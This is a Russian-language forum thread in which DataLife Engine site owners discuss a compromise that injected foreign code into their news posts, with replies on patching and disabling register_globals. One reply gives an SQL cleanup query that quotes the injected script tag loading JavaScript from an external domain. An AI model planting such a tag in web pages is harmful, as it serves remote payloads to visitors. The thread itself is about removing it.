Помощь Инородный код новостях?!

Тема в разделе "DLE", создана пользователем DeQuade, 14 янв 2011.

Информация :
Актуальная версия DataLife Engine 11.2
( Final Release v.11.2 | Скачать DataLife Engine | Скачать 11.2 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 10.0 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. DeQuade

    DeQuade Создатель

    Регистр.:
    19 фев 2010
    Сообщения:
    15
    Симпатии:
    1
    Возникла такая проблема, при добавлении или редактировании через админку новых новостей в полном и кратком описаниях появился инородный код.
    Как от него избавиться, заранее благодарен...
    Скрин:
    Безымянный.JPG
     
  2. pronax

    pronax Постоялец

    Регистр.:
    21 сен 2008
    Сообщения:
    146
    Симпатии:
    10
    скорее всего ваш сайт был взломан
    следует искать в
    /engine/inc/addnews.php
    и
    /engine/modules/addnews.php
     
    DeQuade нравится это.
  3. DeQuade

    DeQuade Создатель

    Регистр.:
    19 фев 2010
    Сообщения:
    15
    Симпатии:
    1
    Странно, но ничего подобного в этих файлах я не нашел... Даже по дате последнего редактирования файла все совпадает. Может быть проблема в чем нибудь другом???
     
  4. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.020
    Симпатии:
    684
    поиском пользоваться никак? А главную раздела хотя бы почитать? Вот похожая тема (ещё на главной но немного пониже...) открыта https://nulled.cc/showthread.php?t=200075
     
    DeQuade нравится это.
  5. DeQuade

    DeQuade Создатель

    Регистр.:
    19 фев 2010
    Сообщения:
    15
    Симпатии:
    1
    Поиском пользовался и думаю если бы нашел похожую тему, то свою бы не создавал! Спасибо за подсказку.
     
  6. WM-Kursor

    WM-Kursor Создатель

    Регистр.:
    6 апр 2010
    Сообщения:
    17
    Симпатии:
    8
    Ставить заплатки и на будущее отключать register_globals надо, т.к. в данном случае скуля работает только при register_globals = on .
     
  7. DeQuade

    DeQuade Создатель

    Регистр.:
    19 фев 2010
    Сообщения:
    15
    Симпатии:
    1
    WM-Kursor, можно с этого места поподробней, так как еще слаб в этих делах....
     
  8. copez

    copez Создатель

    Регистр.:
    31 мар 2009
    Сообщения:
    12
    Симпатии:
    0
    У меня та же байда с этиv кодом. Причём на многих сайтах и на разные FTP. Ломали явно не по FTP - так как у меня стоит блокировка по IP.
     
  9. copez

    copez Создатель

    Регистр.:
    31 мар 2009
    Сообщения:
    12
    Симпатии:
    0
    Нашёл способ лечения:
    В phpmyadmin выбираем вкладку "Экспорт" и нажимаем ОК, сохраняем на компьютер!
    Открываем эту базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (karbjurator)*(js) а в поле замена вписываем karbjurator.co.cc , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!
    Этим мы избавились от разного кода! Сохраняем изменения!
    Идем в phpmyadmin ---> структура ----> и отмечаем все галочки ---> далее удаляем все!
    Теперь идем во вкладку "импорт" , нажимаем обзор и выбираем нашу измененную БД, ставим вместо utf8 ---> cp1251 и нажиимаем ОК! База загружена!

    Теперь снова идем во вкладку SQL и выполняем такой запрос:


    UPDATE dle_post
    SET
    short_story=REPLACE(short_story, '<script src="http://karbjurator.co.cc" type="text/javascript"></script>', ''),
    `full_story`=REPLACE(full_story, '<script src="http://karbjurator.co.cc" type="text/javascript"></script>', '')
    WHERE
    `short_story` LIKE '%<script src="http://karbjurator.co.cc" type="text/javascript"></script>%'
    OR
    `full_story` LIKE '%<script src="http://karbjurator.co.cc" type="text/javascript"></script>%'
     
  10. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.020
    Симпатии:
    684
    Ссылка выше на другую тему для кого? :-]
    1. https://nulled.cc/showpost.php?p=1689846&postcount=6
    2. http://forum.searchengines.ru/showpost.php?p=8316704&postcount=8Можно все гораздо быстрее сделать и без заморочек с вордом/нотпадом и т.п.

    Закройте уже эту тему, а то две соседние темы ведут на одну и туже тему :die:
     
    paul_rem нравится это.
Статус темы:
Закрыта.